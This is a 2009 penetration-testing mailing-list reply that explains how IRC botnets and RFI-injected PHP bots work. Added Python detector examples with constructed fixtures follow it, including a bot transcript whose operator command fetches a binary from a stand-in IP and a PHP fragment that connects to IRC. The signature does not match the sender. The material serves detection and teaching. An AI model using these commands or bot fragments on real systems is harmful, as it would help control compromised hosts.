Penetration Testing mailing list archives
Re: Botnets
From: Aarón Mizrachi <unmanarc () gmail com>
Date: Thu, 26 Mar 2009 22:45:35 -0430
On Wednesday 25 March 2009 01:22:14 M.D.Mufambisi wrote:
Hi Guys. Can someone please explain to me how botnets use IRC? I want to make a presentation to my group demonstrating this in my lab, which comprises 4 WinXP boxes, unpatched. How are commands issued via IRC?
Hi, I compiled some info on botnets during my forensics work... Botnets are a new name for an old technique: TROJANS. More specifically: widely spreadable trojans that can act as zombies or use your computer for non-legitimate purposes...

A popular method (since Sub7, inclusive) is to make a reverse connection to a public IRC server, which believes that you are a legitimate user of its chatrooms.

Why botnets?

1st motivation: a useful way to bypass firewalls. When a bot/trojan makes a connection to an IRC server, it connects like a normal user does. In the past, firewalling only protected you against incoming connections, but outgoing connections were allowed by default.

2nd motivation: hide the attacker's IP address. An attacker could connect to the IRC server and make connections to the client directly. Therefore the attacker does not show any IP address. (The IRC server could log the attacker's IP address, but... the attacker could also use a proxy.)

3rd motivation: aggregation. An attacker could connect to only one IRC server to control thousands of computers. There is no need to connect to every hacked computer to do a specific action (e.g. attack and shut down a website by flooding, or send spam across a distributed network).

How does it work on IRC? A bot, an infected computer, or whatever you'd like to name it, emits an outgoing connection to a public or private IRC server (it's well known that users always click "yes, permit outgoing connection" as well...). Generally it's a public IRC server. This client authenticates and opens a common channel (or a set of them); then an IRC bot can chat at random or with an AI engine to prevent drops, also responds to the IRC protocol's PING/PONG, and listens for a keyword. This keyword/password generally acts as an "ignitor" and allows the attacker to send commands. An attacker joins the bot channel, sends the password, and then sends commands in plaintext (like a bash), and all these commands are delivered over the IRC protocol to every bot in the channel. Therefore, every bot checks, interprets and executes the command.

IRCS? IRC over SSL is a specific technique used by specific sophisticated trojans to circumvent IDS/IPS that can't look into SSL.

--------------------------------------------------------------------------------------

More on the edge... We usually think that a botnet acts like a .exe running on my machine, coming from an infected USB unit or by phishing. But botnets are spreading over systems that I never thought of before...

_Botnets over PHP_

This is a relatively new method used by some people to extend a botnet's scope over webservers, which commonly have more bandwidth than a simple home computer.

How does it work? In a recent forensic I did, I discovered a PHP botnet injected by an RFI attack. This was an excellent cover: the attacker used a page celebrating a baby's birth. If you took a look at this page, there was only a newborn-baby page... but if you looked inside deeply, you would find obfuscated and self-encrypted PHP code. That PHP code had an fsockopen PHP command to a set of IRC servers (with failovers and random functions...). I remark that the PHP code was injected with the RFI method. It makes a connection to an IRC server and lets the attacker deface many sites, centralized from an IRC.

------------------------

Then what did I conclude in my forensic investigation? This method allowed an attacker to control a server without infecting it directly, and also without leaving hard traces on the hard drive... It was luck that the page was still there when I did the forensic. And it was luck that I didn't believe that this page was real.
Kind regards,
Munyaradzi

------------------------------------------------------------------------
This list is sponsored by: InfoSec Institute

Tired of using other people's tools? Why not learn how to write your own exploits? InfoSec Institute's Advanced Ethical Hacking class teaches you how to write stack and heap buffer overflow exploits for Windows and Linux. Gain your Certified Expert Penetration Tester (CEPT) cert as well.
http://www.infosecinstitute.com/courses/advanced_ethical_hacking_training.html
------------------------------------------------------------------------
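The reply above describes the IRC mechanics from the bot's side: an outgoing connection, NICK/USER registration, a JOIN to a shared channel, PONG answers to the server's PING, and command lines arriving as PRIVMSG from the operator. The following is an added example, not code from the original post or from any project it mentions, showing how a defender can turn those mechanics into a detector: it parses IRC lines in the RFC 1459 layout and scores a captured session for bot-like behaviour. The two session transcripts, the nick pattern, the command-prefix convention and the scoring threshold are all constructed assumptions for illustration.

```python
"""Flag IRC sessions that behave like a bot answering a command channel.

Added example (not from the original post). The transcripts below are
constructed: '>' marks lines the client sent, '<' lines it received, as a
network sensor might record an outbound TCP/6667 flow.
"""
import re
from dataclasses import dataclass, field

# Constructed: an infected host joining a channel and receiving operator commands.
BOT_SESSION = """\
> NICK USA|XP|38271
> USER xp 8 * :xp
< :irc.example.net 001 USA|XP|38271 :Welcome
> JOIN #c0ntrol
< :USA|XP|38271!xp@10.0.0.5 JOIN :#c0ntrol
< PING :irc.example.net
> PONG :irc.example.net
< :op!op@203.0.113.7 PRIVMSG #c0ntrol :.login s3cr3t
< :op!op@203.0.113.7 PRIVMSG #c0ntrol :.update http://203.0.113.7/new.bin
< :op!op@203.0.113.7 PRIVMSG #c0ntrol :.run
< PING :irc.example.net
> PONG :irc.example.net
"""

# Constructed: a person chatting normally on the same server.
HUMAN_SESSION = """\
> NICK alice
> USER alice 8 * :Alice
> JOIN #python
< :bob!b@192.0.2.4 PRIVMSG #python :anyone tried 3.1 yet?
> PRIVMSG #python :yes, works fine here
< PING :irc.example.net
> PONG :irc.example.net
"""

# Heuristics (assumptions tuned for these samples, not a vendor signature set).
COMMAND_STYLE = re.compile(r'^[.!@#$%]\w')                              # ".login", "!run", ...
GENERATED_NICK = re.compile(r'^[A-Za-z]{2,4}[|\[][\w|\[\]-]*\d{3,}$')   # e.g. USA|XP|38271


def parse_irc_line(line):
    """Split one RFC 1459 line into (prefix, COMMAND, [params...]).

    The trailing parameter (after ' :') may contain spaces and is kept whole.
    """
    prefix = None
    if line.startswith(':'):
        prefix, _, line = line[1:].partition(' ')
    if ' :' in line:
        head, _, trailing = line.partition(' :')
        params = head.split() + [trailing]
    else:
        params = line.split()
    command = params.pop(0).upper() if params else ''
    return prefix, command, params


@dataclass
class SessionFindings:
    nick: str = None
    channels: set = field(default_factory=set)
    pong_replies: int = 0
    client_messages: int = 0
    command_messages: list = field(default_factory=list)
    operators: set = field(default_factory=set)
    indicators: list = field(default_factory=list)


def analyze_session(transcript):
    """Walk a '<'/'>' transcript and collect the behaviours the post describes."""
    f = SessionFindings()
    for raw in transcript.splitlines():
        raw = raw.strip()
        if not raw or raw[0] not in '<>':
            continue
        sent_by_client = raw[0] == '>'
        prefix, cmd, params = parse_irc_line(raw[1:].strip())
        if sent_by_client:
            if cmd == 'NICK' and params:
                f.nick = params[0]
            elif cmd == 'JOIN' and params:
                f.channels.update(params[0].split(','))
            elif cmd == 'PONG':
                f.pong_replies += 1
            elif cmd == 'PRIVMSG':
                f.client_messages += 1
        elif cmd == 'PRIVMSG' and len(params) == 2:
            target, text = params
            # Operator commands: punctuation-prefixed words in a channel we joined.
            if target in f.channels and COMMAND_STYLE.match(text):
                f.command_messages.append(text)
                f.operators.add(prefix.split('!')[0] if prefix else '?')
    if f.nick and GENERATED_NICK.match(f.nick):
        f.indicators.append(f'generated-looking nick {f.nick!r}')
    if f.command_messages:
        f.indicators.append(f'{len(f.command_messages)} command-style channel messages')
        if len(f.operators) == 1:
            f.indicators.append('all commands come from one operator nick')
    if f.pong_replies and not f.client_messages:
        f.indicators.append('client answers PING but never talks (silent keep-alive)')
    return f


def is_suspicious(findings, threshold=3):
    return len(findings.indicators) >= threshold


if __name__ == '__main__':
    for name, session in (('bot', BOT_SESSION), ('human', HUMAN_SESSION)):
        found = analyze_session(session)
        print(name, 'suspicious' if is_suspicious(found) else 'ok', found.indicators)
```

The human session scores zero indicators while the bot session hits all four, which is the point of combining weak signals: any one of them (a PONG, a joined channel, a dotted word) is normal IRC, but a registered client that never chats, answers every PING, and only ever receives punctuation-prefixed lines from a single nick looks like the "ignitor plus commands" pattern the post describes. Real traffic would be fed in from a sensor rather than an inline string, and IRC over SSL (the IRCS case in the post) would need TLS termination or host-side capture before this parser sees anything.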
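The PHP case in the reply (an innocent-looking page carrying obfuscated, self-decoding code with an fsockopen to a list of IRC servers) lends itself to a static check a web host can run over its document root. The following is an added example, not code from the original post, written in Python as a scanner rather than in PHP: it peels nested base64 layers out of a file, then looks for the socket call, IRC port numbers and IRC verbs in the decoded code. Both page fixtures are constructed; the "infected" one carries only a short fragment resembling a decoded layer (server list, random failover, socket open, registration), not a working bot, and the port list and length threshold are assumptions.

```python
"""Scan PHP source for a hidden, self-decoding fragment that talks IRC.

Added example (not from the original post). The page contents below are
constructed fixtures; the "infected" one holds only a fragment that resembles
the decoded layer the post describes, not runnable bot code.
"""
import base64
import binascii
import re

# A base64 literal long enough to be a payload rather than a short token.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")
# eval()/assert()/create_function() fed straight from a decoder.
OBFUSCATED_EVAL = re.compile(
    r'\b(?:eval|assert|create_function)\s*\(\s*'
    r'(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(')
SOCKET_CALL = re.compile(r'\bfsockopen\s*\(')
IRC_PORT = re.compile(r'\b(?:6667|6697|7000)\b')      # assumption: common IRC ports
IRC_VERBS = re.compile(r'\b(?:NICK|USER|JOIN|PRIVMSG|PONG)\b')


def unwrap_layers(src, max_depth=3):
    """Return [src, decoded layer 1, decoded layer 2, ...], decoding every
    long base64 literal found in the previous layer, up to max_depth deep."""
    layers, frontier = [src], [src]
    for _ in range(max_depth):
        decoded = []
        for text in frontier:
            for match in B64_LITERAL.finditer(text):
                try:
                    raw = base64.b64decode(match.group(1), validate=True)
                    decoded.append(raw.decode('latin-1'))
                except (binascii.Error, ValueError):
                    continue
        if not decoded:
            break
        layers.extend(decoded)
        frontier = decoded
    return layers


def scan_php(src):
    """Return a list of human-readable findings; an empty list means nothing matched."""
    findings = []
    layers = unwrap_layers(src)
    if OBFUSCATED_EVAL.search(src):
        findings.append('eval of decoded payload')
    if len(layers) > 1:
        findings.append(f'{len(layers) - 1} decodable base64 layer(s)')
    # Blank the blobs before searching so a digit run inside base64 text
    # cannot be mistaken for a port number or a verb.
    code = '\n'.join(B64_LITERAL.sub('""', layer) for layer in layers)
    if SOCKET_CALL.search(code):
        findings.append('fsockopen call')
    if IRC_PORT.search(code):
        findings.append('IRC port number')
    if len(set(IRC_VERBS.findall(code))) >= 2:
        findings.append('IRC protocol verbs')
    return findings


def is_ircbot_candidate(src):
    f = scan_php(src)
    return 'fsockopen call' in f and ('IRC port number' in f or 'IRC protocol verbs' in f)


# --- constructed fixtures ---------------------------------------------------
# Fragment resembling the innermost decoded layer. It is data for the scanner,
# not PHP that is executed anywhere in this file.
INNER_FRAGMENT = (
    '$h=array("irc.example.net","irc2.example.org");'
    '$f=fsockopen($h[array_rand($h)],6667,$e,$s,30);'
    'fputs($f,"NICK php".rand(1000,9999)."\\r\\n");'
    'fputs($f,"USER x 8 * :x\\r\\n");fputs($f,"JOIN #c\\r\\n");'
)
_inner_b64 = base64.b64encode(INNER_FRAGMENT.encode()).decode()
_outer_b64 = base64.b64encode(f"eval(base64_decode('{_inner_b64}'));".encode()).decode()

INFECTED_PAGE = (
    "<html><body><h1>Welcome to the world, little one!</h1>\n"
    "<p>Born March 2009, 3.4 kg.</p></body></html>\n"
    f"<?php eval(base64_decode('{_outer_b64}')); ?>\n"
)
CLEAN_PAGE = (
    "<html><body><h1>Welcome to the world, little one!</h1>\n"
    "<p>Born <?php echo date('F Y'); ?></p></body></html>\n"
)

if __name__ == '__main__':
    for name, page in (('infected', INFECTED_PAGE), ('clean', CLEAN_PAGE)):
        print(name, is_ircbot_candidate(page), scan_php(page))
```

Two design points follow from the post: the findings are reported per decoded layer because the malicious code was "obfuscated and self-crypted", so matching only the visible source would see nothing but a birth announcement; and the verdict requires the socket call plus an IRC port or verbs, since base64 and eval alone also appear in legitimate (if ugly) templates. On a live server the same scan would run over every .php and .inc under the document root, and the RFI vector it complements is closed by never passing user input to include/require and by disabling allow_url_include.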
Current thread:
- Botnets M.D.Mufambisi (Mar 26)
- Re: Botnets Aarón Mizrachi (Mar 30)
- Re: Botnets sr. (Mar 30)
- Re: Botnets Laurens Vets (Mar 30)
- Re: Botnets the.soylent (Mar 30)
- Re: Botnets Wasim Halani (Mar 30)
- RE: Botnets Dishman, James L (Mar 30)
- Re: Botnets M.D.Mufambisi (Mar 30)